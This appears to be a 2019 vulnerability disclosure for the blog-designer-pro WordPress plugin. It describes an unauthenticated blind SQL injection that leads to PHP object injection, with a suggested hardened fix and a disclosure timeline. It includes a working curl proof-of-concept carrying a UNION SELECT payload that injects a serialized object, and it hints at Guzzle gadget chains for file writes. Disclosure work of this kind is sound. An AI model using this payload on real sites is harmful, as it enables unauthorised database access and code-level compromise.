WordPress plugin: blog-designer-pro <= 2.5.0 - blind SQL injection leading to PHP Object Injection

## Abstract

Blog Designer is an effective and user-friendly way to beautify the blog pages on your websites. It’s a very popular plugin for a website’s WordPress blog to attract more clients as well as more blog visitors. Blog Designer makes your blog section more intuitive with no coding skills. It’s very easy to manage, for beginners through to website developers. The Blog Designer plugin is bundled with 45 precisely designed templates for various categories, and we will keep adding more in future versions.[1]

## Vulnerability - blind SQL injection leading to PHP Object Injection

There’s an unprivileged ajax action (a `wp_ajax_nopriv_` hook, so it is reachable without authentication) that’s vulnerable to SQL injection, and its results are then passed verbatim to unserialize():

```php
add_action('wp_ajax_nopriv_get_loadmore_blog', array(&$this, 'bdp_loadmore_blog'), 12);

// ...

function bdp_loadmore_blog() {
    global $wpdb;
    ob_start();
    // Request parameter is used without any validation or casting
    $blog_shortcode_id = $_POST['blog_shortcode_id'];
    $tableName = $wpdb->prefix . 'blog_designer_pro_shortcodes';
    // String concatenation straight into the WHERE clause: SQL injection
    $get_settings_query = "SELECT * FROM $tableName WHERE bdid = " . $blog_shortcode_id;
    $settings_val = $wpdb->get_results($get_settings_query, ARRAY_A);
    $allsettings = $settings_val[0]['bdsettings'];
    if (is_serialized($allsettings)) {
        // Whatever the (injectable) query returned reaches unserialize(): PHP Object Injection
        $bdp_settings = unserialize($allsettings);
    }
    // ... remainder of the function not reproduced in this advisory
}
```

I didn’t look to see if there’s a variable in the templates that could be used to smuggle information out of the database, but it’s possible there’s one there also. The unserialize is a big deal though, because for example I can do this if there’s a class Foo anywhere in WordPress:

```sh
# The CONCAT() of hex bytes decodes to the serialized string  O:3:"Foo":0:{};
curl -v -d 'action=get_loadmore_blog' -d 'blog_layout=blog_layout' -d "blog_shortcode_id=-1 UNION SELECT NULL,NULL,CONCAT(0x4f,0x3a,0x33,0x3a,0x22,0x46,0x6f,0x6f,0x22,0x3a,0x30,0x3a,0x7b,0x7d,0x3b)" http://vulnerable.host/wp-admin/admin-ajax.php
```

Tested on a much older version, but I can’t see anything in 2.5 that’d stop it. This will result in a 500 server error, because the object can’t be used as an array:

```
PHP Fatal error:  Uncaught Error: Cannot use object of type Foo as array in /www/wp-content/plugins/blog-designer-pro/blog-designer-pro.php:1061
```

… however, debugging shows that the __destruct() method is still called (the fatal error happens after the object has already been constructed by unserialize()), so if for example a plugin with Guzzle 6.0.x is installed, arbitrary file writes anywhere that PHP has privileges should be fairly trivial - exploiting this is left as an exercise for the reader.

It looks like the wp_ajax_nopriv_get_load_onscroll_blog and wp_ajax_nopriv_filter_change actions are vulnerable as well, following the same pattern.
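For contrast, here is how the same handler looks once both defects described above (the unparameterised query and the unrestricted unserialize()) are closed. This is an added illustration written for this write-up, not the plugin’s code and not the vendor’s 2.5.1 fix, which was not reviewed; it assumes the standard WordPress `$wpdb` API (`prepare`, `get_row`), the `absint()` and `wp_send_json_*` helpers, and the same table and column names as the vulnerable function. The function and hook names with the `_hardened` suffix are invented for the example.

```php
<?php
// Added example: hardened version of the loadmore handler. Illustrative only;
// this is not the plugin's own code. Assumes WordPress core helpers ($wpdb,
// absint, wp_send_json_error/success) and the plugin's table layout.

function bdp_loadmore_blog_hardened() {
    global $wpdb;

    // 1. Validate the identifier as a positive integer before it goes anywhere
    //    near SQL. absint() is a WordPress helper; 0 (missing or non-numeric
    //    input such as "-1 UNION SELECT ...") is rejected up front.
    $blog_shortcode_id = isset($_POST['blog_shortcode_id'])
        ? absint($_POST['blog_shortcode_id'])
        : 0;
    if ($blog_shortcode_id === 0) {
        wp_send_json_error('invalid shortcode id', 400);
    }

    // 2. Parameterise the query. %d forces integer formatting, so the value
    //    can never become part of the SQL text. Select only the column needed.
    $tableName = $wpdb->prefix . 'blog_designer_pro_shortcodes';
    $row = $wpdb->get_row(
        $wpdb->prepare("SELECT bdsettings FROM {$tableName} WHERE bdid = %d", $blog_shortcode_id),
        ARRAY_A
    );
    if (empty($row) || empty($row['bdsettings'])) {
        wp_send_json_error('shortcode not found', 404);
    }

    // 3. Defence in depth on the deserialisation step (PHP >= 7.0):
    //    allowed_classes => false makes unserialize() turn any object into
    //    __PHP_Incomplete_Class, which has no __wakeup()/__destruct(), so even a
    //    tampered database row cannot reach an object-injection gadget.
    //    Settings are expected to be a plain array; anything else is refused.
    $bdp_settings = is_serialized($row['bdsettings'])
        ? unserialize($row['bdsettings'], array('allowed_classes' => false))
        : false;
    if (!is_array($bdp_settings)) {
        wp_send_json_error('corrupt settings', 500);
    }

    // ... render the blog templates with $bdp_settings as before ...
    wp_send_json_success($bdp_settings);
}

add_action('wp_ajax_nopriv_get_loadmore_blog_hardened', 'bdp_loadmore_blog_hardened', 12);
```

Two design points: casting with `absint()` alone would already defeat the UNION payload, but `$wpdb->prepare()` with `%d` is kept as the primary control so the protection does not depend on every caller remembering the cast; and `allowed_classes => false` is a separate layer that protects the `unserialize()` call even if the stored settings were ever written by another vulnerable code path. The same two changes apply to the other `wp_ajax_nopriv_` actions mentioned above.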

## Solution

This is apparently fixed in v2.5.1 - the client ceased using it, so I wasn’t able to check it.

## Disclosure Timeline

  • 2019-02-23: Vendor contacted via Envato contact form, which rejected my message - presumably due to the PoC.
  • 2019-02-23: Vendor contacted via their support website.
  • 2019-02-25: Fix pushed out.
  • 2019-02-26: Public disclosure.

## References

  1. https://codecanyon.net/item/blog-designer-pro-for-wordpress/17069678

Author: fwaggle
